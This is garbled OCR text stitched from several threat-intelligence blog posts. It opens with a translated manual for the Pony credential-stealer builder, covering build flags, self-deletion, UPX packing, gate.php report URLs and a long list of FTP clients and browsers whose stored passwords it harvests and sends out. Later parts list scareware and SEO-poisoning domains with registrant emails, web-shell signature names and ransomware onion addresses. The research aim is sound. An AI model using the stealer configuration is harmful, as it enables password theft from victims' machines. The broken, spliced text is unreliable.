Encryption password - a password that is encrypted records, similar to 
the password must be installed in the server configuration. 


Save reports to disk (for debugging) - when you start "Pony.exe", after 
the passwords have been collected in the same directory where the 
executable is running, it will create a file "out.bin", a container with 

a password in this form in which he was sent to the server for further 
processing (decoding). 


Sending blank reports (for statistics) - usually, if no password is 
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http://elemental-form. pasbirrada.com/ 


http://form-heirship. pasbirrada.com/ 
http://referee-form. pasbirrada.corm/ 
http://form-procedure. pasbirrada.com/ 
http://intent-form. pasbirrada. com/ 
http://ub-form. pasbirrada. com/ 
http://form-946. pasbirrada. com/ 
http://suport-form. pasbirrada. com/ 
http://form-jamie. pasbirrada. com? 
http:/465-form. pasbirrada.com/ 
http://hqda-form. pasbirrada. corm/ 
http://sas/O-form. pasbirrada.com/ 
(ea http:/voyuer-form. pasbirrada.com/ 
a http://objection-form. pasbirrada.com/ 
http:/form-unload. pasbirrada.com/ 
ag|http://ss-form. pasbirrada.cam/ 
fa http://form-6130. pasbirrada.com/ 
eg http: /idpa-form. pasbirrada.com/ 
euhttp://hours-form. pasbirrada.corm/ 
http://dvla-form. pasbirrada. com? 
http://rfid-form. pasbirrada. com/ 
http: //form-4761.pasbirrada.com/ 
sghttp://form-psychology.pasbirrada.com/ 
eG http: //fillable-form. pasbirrada. corn/ 
http: /raci-form. pasbirrada. cam? 
ag http:/form-5300. pasbirrada.com/ 
fA\http://form-thickness. pasbirrada. corn/ 
Aeglhttp:/form-174.pasbirrada.cam/ 
Fegihttp:/form-rx3.pasbirrada.com/ 
http://quadra-form. pasbirrada. corm? 
http://sart-form. pasbirrada. com/ 
http://prenuptual-form. pasbirrada. com/ 
ealhttp://asset-form. pasbirrada.com/ 
eal http://form-5081. pasbirrada. com/ 
aq http:/form-1338. pasbirrada.corm/ 
S]ag|http://roadliner-form. pasbirrada.com/ 


Two sampled scareware samples during the past 24 hours phone back to goldmine- 
sachs .com (Goldman Sachs typosquatting) - 83.133.122.211; 89.47.237.52 - Email: 
driguez.dallas@romehotels.com and to june-crossover .com - 83.133.123.109 - Email: 
doru@sattenis.com. In regard to [4]89.47.237.52, the "fan club" used it to [5]host scareware 


in their June’s campaigns. 


AltusHost Inc./ALTUSHOST-NET is expected to take action shortly. 


This post has been reproduced from [6]Dancho Danchev’s blog. 


. http: //blogs.zdnet .com/security/?p=3962 


1 
2. bttp://www.virustotal.com/analisis/7e8cd272e83020c63£5fdc087£ cc03f23c3690f bc66ef 9e2c5b10320de0d2225- 1249 


3. bttp://www.virustotal.com/analisis/8cdb3d69147640c82c8b1657ba90c5da3ecb1ee0eec5d6f c6ec23c07953£6£6c- 1249 
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found, the client "Pony.exe" personal server will not send, but it is 

sometimes useful to include this option to get statistics on the number 

of successful launches "Pony.exe". 

Debug mode - removes an interceptor exceptions, be used only for debugging purposes. 


Send only new records - if this option is not activated, then the duplicate records with 
passwords are not sent. 


Samoudalenie - running the file "Pony.exe" will be removed after the exit. 
Add an icon - an icon to attach the selected file to be compiled. 

Packing build with UPX - compress executable "Pony.exe" after compilation. 
Number of attempts to send the report - how many times to try to send a 
report when an unsuccessful transmission, it is recommended to specify a 
minimum of two attempts. 

Build Alternative: 

Exe-file - normal executable Windows (*. Exe) 

Dil-file - version of the assembly in the form. DII libraries, it is 

completely autonomous, to practice you must call from your project 
API-only function LoadLibrary (), ie URL to send the password and all 
settings are sewed in myself. DIl file. In the folder DilTest is a 

simple example of testing, in the same folder to put the file Pony.dll, 

then run the file DilTest.exe, which in turn calls LoadLibrary () for. 


DII library. 


In the "Available Modules decoding" can be excluded from the build 
unneeded passwords decoder, it will reduce the size of the build. 


Skin 


On this tab, you can choose a favorite skin (skin) Builder. 


Starting the Builder from the command line 


The following command line arguments Builder: 


-PACK _REPORT - compress reports 
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-ENCRYPT _REPORT - encrypt the records, if encryption password is not specified, the de- 
fault will be listed "Mesoamerica" 


-REPORT _PASSWORD = - password encryption, for example:-REPORT _PASSWORD = 
Mesoamerica 


-SAVE REPORT - save reports to disk (for debugging) 
-ENABLE DEBUG _MODE - debug mode 

-SEND MODIFIED _ONLY - send only the new records 
-SELF DELETE - enable samoudalenie 

-SEND EMPTY _REPORTS - send a blank report 

-ADD _ICON - attach a file icon from Pony.ico 

-UPX - Build pack using UPX 


-DOMAIN LIST = - list of domains, each domain must be divided by spec. the symbol \ 
n, for example:-DOMAIN _LIST = [18]http://host.com/gate.php \ nhttp :// host2.com/x/gate. php 


-LOADER LIST = - a list of URL for the loader (it will be automatically 
activated in the presence of URL), each URL must be divided similarly 
DOMAIN _LIST 

-LOADER _EXECUTE NEW _FILES ONLY - do not run the same files twice 
-DISABLE MODULE = - excluding specific module build decoding (all the 
names of the modules can be seen in the file PonySrc \ FTPClients.asm), 
for example:-DISABLE MODULE = MODULE _OPERA 

-DLL _MODE - use the assembly in the form of Dil-library 

-COLLECT _HTTP - in addition to collect and HTTP / HTTPS passwords 


-UPLOAD _RETRIES = N - the number (N) attempts to send a report if no value is speci- 
fied, the default is 2 attempts 


Client "Pony.exe" 


The task of "Pony.exe" - to collect passwords from the computer and send them to the 
server for processing. 
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Works on all versions of Windows, from Win98, including server. It works 
in the mode of x86 and x64. The program normally work out when you run 


as an administrator or user. 


Before the proliferation of file it is desirable to clean and kriptanut. 


Implemented the instant decryption of stored passwords for the following programs: 


System Info 

FAR Manager 
Total Commander 
WS _FTP 

CuteFTP 
FlashFXP 

FileZilla 

FTP Commander 
BulletProof FTP 
SmartFTP 
TurboFTP 

FFFTP 

CoffeeCup FTP / Sitemapper 
CoreFTP 

FTP Explorer 
Frigate3 FTP 
SecureFX 
UltraFXP 


FTPRush 
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WebSitePublisher 
BitKinex 
ExpanDrive 
ClassicFTP 

Fling 

Softx 

Directory Opus 
FreeFTP / DirectFTP 
LeapFTP 

WinSCP 

32bit FTP 
NetDrive 
WebDrive 

FTP Control 
Opera 

WiseFTP 

FTP Voyager 
Firefox 

FireFTP 
SeaMonkey 

Flock 

Mozilla 

LeechFTP 

Odin Secure FTP Expert 


WinFTP 
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FTP Surfer 
FTPGetter 

ALFTP 

Internet Explorer 
Dreamweaver 
DeluxeFTP 

Google Chrome 
Chromium / SRWare Iron 
ChromePlus 
Bromium (Yandex Chrome) 
Nichrome 

Comodo Dragon 
RockMelt 

K-Meleon 

Epic 

Staff-FTP 

AceFTP 

Global Downloader 
FreshFTP 

BlazeFTP 

NETFile 

GoFTP 

3D-FTP 

Easy FTP 


Xftp 
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LinasFTP 

Cyberduck 

Putty 

Notepad + + 

CoffeeCup Visual Site Designer 
FTPShell 

FTPInfo 

NexusFile 

FastStone Browser 
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bu92vGDa33Uh4cWc874kUwfAziiuMofFotbKOvy650a_oxXJv7PQpz7Q 


16. http://somedomain. com/dir/gate. php 
17. http://privatedomain. com:8080/gate. php 
18. http://host .com/gate.php 


18.8.19 In Retrospective - A Peek Inside A Popular Cybercrime Friendly Doorway 
Generator - An OSINT Analysis (2022-08-18 20:12) 
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As I’m continuing to go through my old archive of actionable threat intelligence information 
I’ve decided some screenshots of what appears to be a pretty advanced and sophisticated 
cybercrime-friendly malicious doorway generator which is fully capable of launching content 
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cloaking campaigns against major search engines on its way to properly hide the true nature 
of a specific spam phishing or a portfolio or a portfolio of domains containing client-side 
exploits and malicious software. 


Rogue and malicious content farms made publicly available thanks to a variety of publicly or 
proprietary accessible malicious and rogue content generators including malicious doorway 
generators will continue to proliferate and populate the modern cybercrime ecosystem. 


I’ll continue monitoring this market segment and will post updates as soon as new develop- 
ments take place. 


Sample screenshots of the cybercrime-friendly doorway generator include: 
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ee [18.4 Mb | so° hd i) 02:40 18.04.13 
oneness a4 1° ¥ 07:10 18.04.13 
Se 32g *328 0° ¥ 07:10 18.04.13 
Sac] 7 29°23 v 07:10 18.04.13 
[SSS Er a*8 s*5 ¥ 07:20 18.04.13 
See 19.4 Mb | 28°28 7 ¥ 07:30 18.04.13 
=, [19.3 Mb | g1°81 42° ¥ 07:30 18.04.13 
—— 97°97 1°? v 07:30 18.04.13 
Se [16.7 Mb | 40° 0° ¥ 07:30 18.04.13 
ees aa°® i ¥ 07:30 18.04.13 
ee 155 °755 126 * 775 ¥ 07:40 18.04.13 
————— 1 14.6 Mb | 1s°%3 0° ¥ 07:40 18.04.13 
————— [13.4 Mb | 400 *209 0° v 07:40 18.04.13 
Sa 242 “282 o° ¥ 07:40 18.04.13 
EE foes 3°3 ¥ 07:40 18.04.13 
——wwn rie 0° v 07:50 18.04.13 
———— 43°4 as ¥ 07:50 18.04.13 
£2 admin @1 A Ouvcrvrs6Q © 15:34:12 % Boog 


© Maik 


24920 


\biz/uploader/projects 
(3D Counansnme cent (Sj Aope: () Nporpammuposanme () Toppenro: (5) Pasnoe (5) Antichat [) Vicormat ok. Ceauam.. 2% Intemational Master... [fl Wapoxodopmarn 


Npoextoi Uploader Vingexcarop Twitter 
Npoexts Crarwcrwka YxHKanvaaTop CkaHep  HacTpoiKku 
+ fotos BB Yaawn 2 dec i Ces. nero: xyenne | © Sarr popes 3 Yaarer. gopy 
Wenn Knoun Wabnon Texctw KatTeropun Mpocbuns Apxue Cratye 
Mpoextoe: 1 | Nagroroenexo: O | Januro: 1 CeepHyte 
ee 111.txt 4 18.txt 10,txt PAz-oTnoxa.tt EER ¥ 
| 2013-04-03 | Npoexros: 136 | Nogroroaneno: O | Janwro: 130 Ceepeyte 
== 111.txt 8 1B.txt 18.txt [03-oTnomxa.txt ¥ 
a= 111.txt 3 6.txt 24.txt FA3-oTnomxa.txt ¥ 
meee 111.txt 1 1.txt 30.txt rf3-oTnox«xa.txt ¥ 
eee 111.,txt 3 19. txt 17.txt Ff3-oTnomxa.txt ¥ 
eo 111.txt 8 4.txt 32.txt fAz-ornomatt ERT ¥ 
ee 111.txt 2 15.txt 4.txt rf3-ornoxxa.txt «= EET ¥ 
Se 111.txt 2 10.txt 16.txt rf3-otnoxxa.txt EZR ¥ 
—— 11 1.txt s 14.txt 7.txt rA3-ornosxa.txt EEE v 
[eee 111.txt 5 13.txt V.txt F3-oTnoxxa.txt ¥ 
iene 111.txt 8 13.txt 36.txt FA3-ornoxxa.txt ¥ 
pee eee 111.txt 3 18.txt 28.txt riz-ornowxa.txt §8ERET v 
ee 111.txt 7 15.txt 30.txt Ff3-oTnoxxa.txt ¥ 


Ladmin @1 


[4] 


24921 


.biz/uploader/settings 


(7 Compeamenme cen () Aope: C) Mporpasmupcearne () Toppenme: () Pasnoe (7) Antichat [7] Viconx ok. Ceauate.. 2% Intemational Master. [fl] Wupoxodopmarn 


HacTponku Uploader Vingexcatop Twitter 


Npoexts:  Cratwctyxa YxHwKanvagatop CkaxHep Hactporxn 


& 
oo ADoGaente curnatypy woeore wenna 


Wenne wso 


FTP weoirtuotui ou sOruu 
JarpyaKa Ajax_PHP Command Shell yncommand\(\'shellhelp 
Cron Antichat Shell v1.3 e bd +) by Grinay 
CkaHep WTF Backdoor 
Obfuscation provided by FOP bfuscation provided b 
PHPSpy 4ngeLnet 
rS7shell RST 
ketek30 ses alleen tas 04a Gaal 
Locus7s 
PHPSpy phe 
cihshell hshe 
MILDNet MILDNet 
OrBackdoor hell - *Or.Back 
ExplorerwSO sbst 4 
Autoriz_MDS_X1 mdS_pass 
Ayylidiz Tim -AYT- Shell v hell v ([0-9\.]+) BizB 
aZRailPhp Silinemedi:\$deldir 
backdor? Coded By Charlichaplin 


backdorfr Ce script permet d\' exploite 


ee ee ee ee ee ee ee 


©100.php Witten by Captain Cronch Tes 


[5] 
24922 


. http://ddanchev.blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with. htm 


6. http: //ddanchev.blogspot.com/ 


5.8.7. U.S Federal Forms Blackhat SEO Themed Scareware Campaign Expanding 
(2009-08-10 18:53) 


85p-fillable-Form.reyc 


UPDATE2: New [l1]scareware domain is in rotation - antispywarelivescanv5 .com - 
83.133.123.174; 83.133.126.155; 91.212.107.5; 94.102.48.29; 94.102.51.26; 188.40.61.236 
- Email: sales.in@bauhmerhhs.com. Redirection takes place through consensualart .cn - 
78.46.201.89 - Email: shanghaihuny@yahoo.com. 


UPDATE: Four new domains have been introduced, again using the services of [2]AltusHost 
Inc. (AS44042): 


thwovretgi .com - 91.214.44.239 - Email: joby47619@msn.com 
hernewdy .com - 91.214.44.152 - Email: jacub26887@lycos.com 
shtifobpy .com - 91.214.44.210 - Email: hiraldo13686@hotmail.com 
vodcotha .com - 91.214.44.203 - Email: jamarcus59884@yahoo.com 


The redirection takes place through mywatermakrs .cn - 78.46.201.89 - Email: shanghai- 
huny@yahoo.com 
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18.8.20 In Retrospective - Random ATM Skimming Screenshots - An OSINT Analysis 
(2022-08-18 20:16) 


I’ve decided to share some of the currently active ATM skimming devices screenshots courtesy 
of a currently active high-profile cybercrime-friendly forum community. 


Sample screenshots of ATM skimming devices offered for sale courtesy of a currently active 
high-profile cybercrime-friendly forum community include: 


he 
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In response to the takedown of the [3]blackhat SEO domains used in the campaign dissected 
lat week, the group has responded by introducing new domains next to new redirectors 
and most interestingly, has started using compromised/mis-configured legitimate sites in an 
attempt to increase the lifecycle of the campaign by making it takedown-proof. 


New blackhat SEO domains again using AS44042 ROOT-AS root eSolutions/ALTUSHOST- 
NET/AltusHost Inc hosting services: 

fifiopod .com - 91.214.44.204 - Email: florenzaluwemba@gmail.com 
trodlocho .com - 91.214.44.204 - Email: alie57575@lycos.com 

ickgetaph .com - 91.214.44.209 - Email: alie57575@lycos.com 
igecanneg .com - 91.214.44.205 - Email: baxter18314@yahoo.com 
somveots .com - 91.214.44.203 - Email: frieda24482@msn.com 
memodreydi .com - 91.214.44.240 - Email: frieda24482@msn.com 
jejnahob .com - 91.214.44.206 - Email: alie57575@lycos.com 

nuwofteuz .com - 91.214.44.206 - Email: frieda24482@msn.com 
hyhoppeo .com - 91.214.44.239 - Email: jamarcus59884@yahoo.com 
egnegvufvu .com - 91.214.44.239 - Email: ehetere29006@yahoo.com 
lauzpeog .com - 91.214.44.208 - Email: ehetere29006@yahoo.com 
sniozeanvo .com - 91.214.44.239 - Email: ehetere29006@yahoo.com 
hebmipenn .com - 91.214.44.207 - Email: adanne43906@rocketmail.com 
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Stay tuned! 
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18.8.21 A Compilation of Dancho Danchev’s Personal Photos - An OSINT Analysis 
(2022-08-27 22:10) 


[1] 
Background 


| was born in Sofia, Bulgaria. My primary area of 

occupation since the early 90's is computers. My 
imary work is Disruptive individual's Chief 
xecutive Officer (CEO) 


Dancho | Ce Regus myer 
Danchev Executive BIO 


Warlndustries - Member 

BlackCode Ravers - Member 

Black Sun Research Facility - Contributor 
DiamondCs - List Moderator/Software Contributor 
LockDownCorp - Help Trojan Database Contributor 
Forbidden HelpNetSecurity - Contributor 
Astalavista Security Group - Managing Director 
Frame4 Security Systems - Contributor 
TechGenix - WindowSecurity - Contributor 

ZDNet Zero Day - Security Blogger 

Webroot Threat Blog - Security Blogger 


Conference and Events - Media and Press Coverage 


Dancho Danchev is the world’s leading expert in the field of cybercrime fighting and threat intelligence gathering 
having actively pioneered his own methodlogy for processing threat intelligence leading to a successful set of 
hundreas of high-quality anaysis and research articles published at the industry's leading threat intelligence blog - 
ZONet's Zero Day, Dancho Banchev's Mind Streams of Information Security Knowledge and Webroot's Threat 
Blog with his research featured in Techmeme, ZDNet, CNN, PCWortd, SCMagazine, TheRegister, NYTimes, CNET, 
ComputerWorld, H*Magazine currently producing threat intelligence at the industry's leading threat intelligence 
blog - Dancho Danchev's - Mind Streams of Information Security Knowledge 


With his research featured at ope, CyberCamp, InfoSec, GCHQ and Interpol the researcher continues to 
actively produce threat intelligence at the industry's leading threat intelligence blog - Dancho Danchev's - 
MinStreams of Information Security Knowledge publishing a diverse set of hundreds of high-quality research 
analysis detailing the malicious and fraudulent activities at nation-state and malicious actors across the globe 


Dear blog readers, 
I’ve decided to share with everyone a set of personal photos courtesy of me. 


Remember that the "best is yet to come" and stay tuned for some of my latest research on this 
blog. 


Meanwhile consider subscribing to my RSS feed here. 
Enjoy! 
Sample personal photos courtesy of Dancho Danchev: 


[2] 
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[3] 
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[4] 


24939 


[6] 
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] 
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[ 
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[8] 
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The cybercriminals are also attempting to use a well proven tactic - occupying as many search 
engine results as possible for a particular hijacked word by using identical blackhat SEO 
junk content at multiple domains. A similar attempt was successfully executed in [4]January, 


2009’s search results poisoning campaign at Google Video, where the first ten results for a 
particular keyword were all malicious in their nature. 
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[9] 
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[10] 
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[11] 
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[12] 


Stay tuned! 


1. https: //blogger . googleusercontent. com/img/b/R29vZ2x1/AVvXsEiGkh2cmDi1Qu_ieMuEr6vfaZqQBOyurVkDKmGmRFFTQxTKL 
6qPWUbniiTpJ19yr0ARS7oXH1HUVQT JIb8IYWjfadUB- qz625f-hHO 
2. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEgBG- TcBv8vzKDBmF AdrE61W_i6iIPdeWYMgpprKpY47pkTY 
NQh50 jDCVODlapzMwxtOmxXWYqctA2WFcwVa3_4MDM1G5Amt J JItuvk 
3. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEiJ10Ci 1W8YWoM2vikSouiuYwcX6-zr6ciSOtHE2PiwU0d1K 
UbG2q0- 220 JDm7ke7nEaPykehFqnHNF617YxLz6cm-VkugzR2ADp37 
4. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEilt8IrZETUOm9xfyJ03nQ418fnthCeQc3aVkS6RkXvqwWilb 
EhX-Kf£Z114AxbvZPBHOgXyQMQeQOaodHN-Gddi2XAOMdzskK- YHy-g 
5. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEg_nD1DNmo1fkeMo8Iv4MGSYPt7kMcfbl0RgVSgwxTQI2Wzt 
jLca_UHLroxKiMXoF 16y4uvD1DiF J1C_MTSSf£ToT4_EtHoSEHg7Ipf 
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6. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVVXsEi0F jNDi jGiLP11N1zU2P1LDJvKPhfn-9U5SK2iMeHS1QA6r 
Cf£vGo43k5o0F10yt JD2ZpDUJS2Xq1mDFzNEcI J8dQEOzT1YPUReHB8s 

7. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgybeqE1XiMjRddxL_- gmOpGxkF pNdoqdS0OxXoov6ebS7FIK 
CS9kt3Lk3tG1ip9eIQrrB45c_8JpwC-uh22Gfi4LwqLJRC5oRVij6se 

8. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEiPTY7F75 JMnzdyA1I j aMRqhMwkt5AioLeUKaioFQasLHsHb 
pEYSHSINttpzwRDyHeX98emF akKQNw5alxnVurAM-n4F17CO3hy8sPf 

9. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgGyut5fUIENavQevJpsBMngOLg3BGpbrzoibusiCiIMVMOE 
GWeCOfzBmMCZiQ-O4RabPxm3puuc4k1lyZwNRXZ5xLPd62zQFsxH_EV 

10. https://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEj cNDrMb6ELBy JhW8GCmKXpmJS6EB j HU6arP41zVBGn9G3 
UoOPXigoP9kfuNT2huwQzpme29ppF OqwAShwI7VUKSf£_DgKH5iCOdCvp 

11. https://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEgJ4B_X11sCt JxM1jwBmfSxid9vBp7MkshMoJg-Wrili0m 
z3ZcoOkBiHpFSpxXOnt- 8x9rGOzeYzXEK39 JOCdOAYrXC7x03mq0CKc3C 

12. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEiirmnutcdaA4b60Gy1450X4bMQwswYY 3MCvmm4V9cE10h 
mau6BZmHdEsMCo_spBN-70atwb_nVo96MEPppJEUGI JxKPirgKK-TxYu 


18.8.22 Exposing a Compilation of Known Ransomware Group’s Dark Web Onion Web 
Sites - An OSINT Analysis (2022-08-27 22:16) 


[1] 


@ Horne Poge- FREFROTR OX OF — 6 
e- ¢€ 


i 


FILEFROZR Updates Buller «= Support Register Login 


FILE FROZR is a great security tool that encrypts most of your files in several minutes. All that you earn 
yours, you pay once for a license, all further inspections are free. 


Coded from scratch BS Affordable and ready to use No need of vps & 


FILE FROZR Is startch| threaded "Out of the box" 4 ci using t 


Dear blog readers, 


I’ve decided to share with everyone some of the findings from some of my latest Dark Web re- 
search with the idea to improve your situational awareness in the world of growing and emerg- 
ing cyber threats including ransomware releases on the infamous Dark Web. 


In this post I’ll provide a currently active list of Dark Web Onion web sites that exclusively 
belong to various ransomware groups with the idea to assist everyone on their way to improve 
their situational awareness in the world of fighting and responding including to monitor and 
track down various ransomware campaigns globally. 


Sample list of currently active ransomware themed Dark Web Onions include: 
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http://37rckgo66iydpvgpwve7b2el5q2zhjw4tv4imyewufnpx4lhkekxkoqd.onion 
http://3kp6j22pz3zkv76yutctosaGdjpj4yib2icvdqxucdaxxedumhgqicpad.onion 
http://3slz4povugieoi3tw7sblxoowxhbzxeju42 7cffsst5fo2tizepwatid.onion 
http://4qbxi3i20qmyzxsjg4fwe4aly3xkped52gq5orp6efpkeskvchqe27id.onion 
http://54bb47h5qu4k 714d 7v5ix3i6ak6elysn3net4by4ihmvrhu7cvbskoqd.onion 
http://54rdhzjzc4ids4u4wata4zr4ywfon5wpz2ml4q3avelgadpvmdal2vaqd.onion 
http://6iaj3efye3q62xjgfxyegrufhewxew7yt4scxjd45tlfafyja6q4ctqd.onion 
http://746pbrxl7acvrihzshosye3b3udk4plurpxt2pp27pojfhkkaooqiiqd.onion 
http://7k4yyskpz3rxq5nyokf6ztbpywzbjtdfanweup3skctcxopmt7tq7eid.onion 
http://alpbhvmmm27o03abo3r2ml|mjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.oni on 
http://anewset3pcya3xvk73hj7yunuamutxxsm5sohkdi32blhmql55tvgqad.onion 
http://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion 
http://bl4cktorpms2gybrcyt52aakcxt6yn37byb65uama5cimhifcscnqkid.onion 
http://blackmax7su6mbwtcyo3xwtpfxpm356jjqrs34y4crcytpw7 mifuedyd.onion 
http://blogxxu75w63ujgqarv476otld7cyjkq4yoswzt4ijadkjwvg3vrvd5yd.onion 
http://bonacifryrxr4siz6ptvokuihdzmjzpveruklxumflz5thmkgauty2qd.onion 
http://ce6roic2ykdjunyzazsxmjpz5wsar4pflpoqzntyww5c2eskcp7dq4yd.onion 
http://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion 
http://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si/6icnqd.onion 
http://darksidc3iux462n6yunevoag52ntvwpb6wulaz3zirkmh4cnz6hhj7id.onion 
http://ft4zr2jziqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion 
http://gamol6n6p2p4c3ad7gxmx3ur7wwdwlywebo2azv3vv5qilmjmole2zbyd.onion 
http://griefcameifmv4hfr3auozmovz5yi6m3h3dwbuqw/baomfxoxz4qteid.onion 
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw/ez7iqy6wc34gd2nekazyd.onion 
http://hl66646wtlp2naoqnhattngigjp5palgqmbwixepcjyq5i534acgqyad.onion 
http://nhpoo4dosa3x4ognfxpqcrjwnsigvsIm7kv6hvmhh2yqczaxy3j6qnwad.onion 
http://jvdamsif53dqjycuozlaye2s47p7xij4x6hzwzwhzrqmv36gkyzohhqd.onion 
http://leaksv7sroztl377bbohzl42i3ddlfsxopcb6355zc7olzigedm5agad.onion 
http://lockbitapt6vx5 7t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onio n 
http://lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion 
http://matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd.onion 
http://mhdehvkomeabau/7gsetnsrhkfign4jgnx3wajth5yb5h6kvzbd72wiqd.on ion 
http://midasbkic5eyfox4dhnijkzc7v7e4hpmsb2qgux7diqbpna4up4rtdad.onion 
http://mrdxtxy6vqeqbmb4rvbvueh2kukb3e3mhu3wdothqn7242gztxyzycid.onion 
http://n3twormruynhn30etmxvasum2miix2jgg56xskdoyihra4wthvigyeyd.onion 
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http://nalr2uqsave7y2r235am5jsfiklffhsh4jcSnztu3rzvmhklwt5j6kid.onion 
http://ng4zyac4ukl4tykmidbzgdlvaboqeqsemkp4t35bzvjeve6zm2|qcjid.onion 
http://pay2key2zkg7arp3kv3cuugdaqwuesifnbofun4j6yjdw5ry7zw2asid.onion 
http://pysa2bitc5ldeyfak4seeruqymas4sj5wt5qkcq7aoyg4h2acqieywad.onion 
http://qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion 
http://quantum445bh3gzuyilxdzs5xdepf3b 7|kcupswvkryf3n7hgzpxebid.onion 
http://r6d636w4 7ncnaukrpvihmtdbvbeltc6enfcuuow3jclomyga7cz374qd.onion 
http://ransomocmou6mnbquqz44ewosbkjk305qjsl3orawojexfook2j7esad.onion 
http://rovuetuneohce3ouxjlbxtimyyxokb4btncxjbo44fbgxqy 7tskinwad.onion 
http://rgleaktxuey67yrgspmhvtnrgqtgogur35lwdrup4d3igtbm3pupc4lyd.onion 
http://rnsm777cdsjrsdibs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onion 
http://santat7kpllt6iyvqbr7q4amdvédzrh6paatvyrzl7ry3zm72zigf4ad.onion 
http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion 
http://spyarea23ttlty6qav3ecmbclpqym3p32lksanoypvrqm6j5onstsjad.onion 
http://tdoe2fiiamwkiadhx2a4dfq56ztlqhzl2vckgwmjtoanfaya4kqvvvyd.onion 
http://u6 7aylig7i6165 7wxmp274eoilaowhp3boljowa6ébli63rxyzfzsbtyd.oni on 
http://vofqgeh5nugm6r2u2qvghsdxm 3fotf5wbxb5ltv6vw7 7vus5frdpuaiid.onion 
http://vomisgjshn4yblehk2vbnil53tlqkixsdaztgphcilto3vdj4geao5qd.onion 
http://vfokxcdzjbpehgit223vzdzwte47|3zcqtafj34qrr26htjo4uf3obid.onion 
http://vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad.onion 
http://wavbeudogz6byhnardd2|kp2jafims3j7tj6k6qnywchn2csngvtffqd.onion 
http://wm6mbuzipviusuc42kcggzkdpbhuv45sn7olyamy6mcqqked3waslibqd.onion 
http://wobpitin7 7vdsdiswr43duntv6eqw4rvphedutpaxycjdie6gg3binad.onion 
http://ws3dh6avé6sjbxxkjpw5ao3wqzmtejnkzheswm4dz5rrwvular7xvkqd.onion 
http://xembshruusobgbvxg4tcjs3jpdnks6xrr6énbokfxadcnic53yxir22ad.onion 
http://xingnewj6m4qytljhfwemngm/7r7rogrindbq/7wrfeepejgxc3bwci7qd.onion 
http://xqkz2rmrqkeqfésjbrb47jfwngxcd402zvaxxzrpbh2piknms37rw2ad.onion 
http://xw7au5pnwtl6lozbsudkmyd32n6gnqdngitjdppybudan3x3pjgpmpid.onion 
http://z6mikrtphid5fmn52nbcbg25tj5 7sowlm3o0c25g563yvsfmygkcxqbyd.onion 
https://3nvzqyo6l4wkrzumzu5aod 7/zbosq4ipgf7ifgj 3hsvbcr5vcasordvqd.onion 
https://Ihxxtrqraokn63f3nubhbjrzxkrgduq3qogp3yr424tkpvh3z7n4kcyd.onion 
https://stniiomyjliimcgkvdszvgen3eaaoz55hreqqx6077yvmpwt7gklffqd.oni on 
Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEiIMNhBM5zi5ak0qolQijXjSN62LeRx3mVOHsd3cXWswwPdC 
ANSdtbBCjGSYJ-uoHdpJPzilgqlF_jNQPN-qVZVDAduNkG8D7zGN9I9 
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18.9 September 


18.9.1 Exposing a Compilation of Known Ransomware Group’s Dark Web Onion Web 
Sites - An OSINT Analysis - Part Two (2022-09-20 13:09) 


[1] 


OT oN AN SONS Sivelcomes you 


This site contains information about 

companies that did not want to cooperate 

with us. 

Part of the information is for sale, partis freely available: 


Hi everyone, 


This is Dancho and I’m proud to let you know that this is the second post part of the "[2]Ex- 
posing a Compilation of Known Ransomware Group’s Dark Web Onion Web Sites - An OSINT 
Analysis" blog post series where | did my best to share actionable intelligence on the Dark Web 
whereabouts of some of the most prominent [3]ransomware groups. 


Sample currently active portfolio of Dark Web Onion Web sites belonging to prominent ran- 
somware groups include: 


http://2cuqgeerjdba2rhdiviezodpu3lc4qz2sjf4qin6f7std2evleqlzjid.onion 
http://37rckgo66iydpvgpwve7b2el5q2zhjw4tv4lmyewufnpx4lhkekxkoqd.onion 
http://3kp6j22pz3zkv76yutctosa6djpj4yib2icvdqxucdaxxedumhgicpad.onion 
http://3nvzqyo6l4wkrzumzu5ao0d7zbosq4ipgf7ifgj3hsvocr5vcasordvqd.onion 
http://3r6n7 7mpe737w4sbxxxrpc5phbluvéxhtdl5ujpnivmck5tc7blq2rqd.onion 
http://3slz4povugieoi3tw7sblxoowxhbzxeju42 7cffsst5fo2tizepwatid.onion 
http://4qbxi3i20qmyzxsjg4fwe4aly3xkped52gq5orp6efpkeskvchqe27id.onion 
http://54bb47h5qu4k 714d 7v5ix3i6ak6elysn3net4by4ihmvrhu7cvbskoqd.onion 
http://54bb47h5qu4k 714d 7v5ix3i6ak6elysn3net4by4ihmvrhu7cvbskoqd.onion 
http://5mvifa3xq5m7sou3xzaajfz7h6eserp5fnkwotohns5pgbb5oxty3zad.oni on 
http://6iaj3efye3q62xjgfxyegrufhewxew7yt4scxjd45tlfafyja6q4ctqd.onion 
http://746pbrxl7acvrihzshosye3b3udk4plurpxt2pp27pojfhkkaoogiiqd.onion 
